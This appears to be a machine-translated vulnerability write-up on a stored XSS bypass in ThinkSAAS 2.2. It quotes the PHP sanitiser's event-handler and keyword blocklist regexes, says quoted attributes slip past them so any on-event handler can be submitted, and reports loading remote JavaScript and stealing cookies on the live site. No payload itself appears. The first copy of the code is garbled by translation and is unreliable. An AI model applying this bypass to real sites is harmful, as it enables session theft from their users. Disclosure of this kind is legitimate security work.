ThinkSAAS 2.2 storage-type XSS (bypassing protection mechanism)

ThinkSAAS 2.2 storage-type XSS (bypassing protection mechanism)

Code snippets filtered by rich text:

 

Function cleanJs ($ text) {$ text = trim ($ text); // $ text = stripslashes ($ text ); // fully filter comments $ text = @ preg_replace ('/<! --?. * -->/', '', $ Text); // completely filter dynamic code $ text = @ preg_replace ('/<\? | \?> /', '', $ Text); // completely filter js $ text = @ preg_replace ('/<script ?. * \/Script>/', '', $ text); // filter excess html $ text = @ preg_replace ('/<\/? (Html | head | meta | link | base | body | title | style | script | form | iframe | frame | frameset | math | maction | marquee) [^> <] *>/I ', '', $ text); // filter the on Event lang jswhile (preg_match ('/(<[^> <] +) (data | onmouse | onexit | onclick | onkey | onsuspend | onabort | onactivate | onafterprint | onafterupdate | average | onbeforeeditfocus | average | onbeforeprint | average | onforebeupdate | onr blur | region | oncellchange | onchange | onclick | oncontextmenu | oncontrolselect | oncopy | oncut | region | ondatasetchanged | region | ondeactivate | ondrag | ondragend | ondragenter | region | ondragover | ondragstart | ondrop | onerror | onerrorupdate | onfilterchange | onfinish | onfocus | onfocusin | enabled | onhelp | onkeydown | onkeypress | onkeyup | enabled | onload | disabled | onmousedown | onmouseenter | enabled | onmousemove | onmouseout | | onmouseup | onmousewheel | onmove | cursor | onmovestart | onpaste | onpropertychange | weight | onreset | onresize | weight | onrowenter | weight | onscroll | onselect | onselectionchange | onselectstart | onstart | onstop | onsubmit | onunload) [^> <] +/I ', $ text, $ mat) {$ text = str_replace ($ mat [0], $ mat [1], $ text );} while (preg_match ('/(<[^> <] +) (window \. | javascript: | js: | about: | file: | document \. | vbs: | cookie) ([^> <] *)/I ', $ text, $ mat) {$ text = str_replace ($ mat [0], $ mat [1]. $ mat [3], $ text);} return $ text ;}

Event Filtering

while ( preg_match ( '/(<[^><]+)(data|onmouse|onexit|onclick|onkey|onsuspend|onabort|onactivate|onafterprint|onafterupdate|onbeforeactivate|onbeforecopy|onbeforecut|onbeforedeactivate|onbeforeeditfocus|onbeforepaste|onbeforeprint|onbeforeunload|onbeforeupdate|onblur|onbounce|oncellchange|onchange|onclick|oncontextmenu|oncontrolselect|oncopy|oncut|ondataavailable|ondatasetchanged|ondatasetcomplete|ondblclick|ondeactivate|ondrag|ondragend|ondragenter|ondragleave|ondragover|ondragstart|ondrop|onerror|onerrorupdate|onfilterchange|onfinish|onfocus|onfocusin|onfocusout|onhelp|onkeydown|onkeypress|onkeyup|onlayoutcomplete|onload|onlosecapture|onmousedown|onmouseenter|onmouseleave|onmousemove|onmouseout|onmouseover|onmouseup|onmousewheel|onmove|onmoveend|onmovestart|onpaste|onpropertychange|onreadystatechange|onreset|onresize|onresizeend|onresizestart|onrowenter|onrowexit|onrowsdelete|onrowsinserted|onscroll|onselect|onselectionchange|onselectstart|onstart|onstop|onsubmit|onunload)[^><]+/i', $text, $mat ) ) {$text = str_replace ( $mat [0], $mat [1], $text );}

Filtered so much... But there is a problem with this regular expression. We can ignore the detection in double quotation marks. We can submit any on event-so many events are written in white ..

Load remote js like this
 

Tested on the official website,
 

Remote js loaded

Cookie Theft and other operations

Solution:

See this http://www.bkjia.com/Article/201406/311810.html.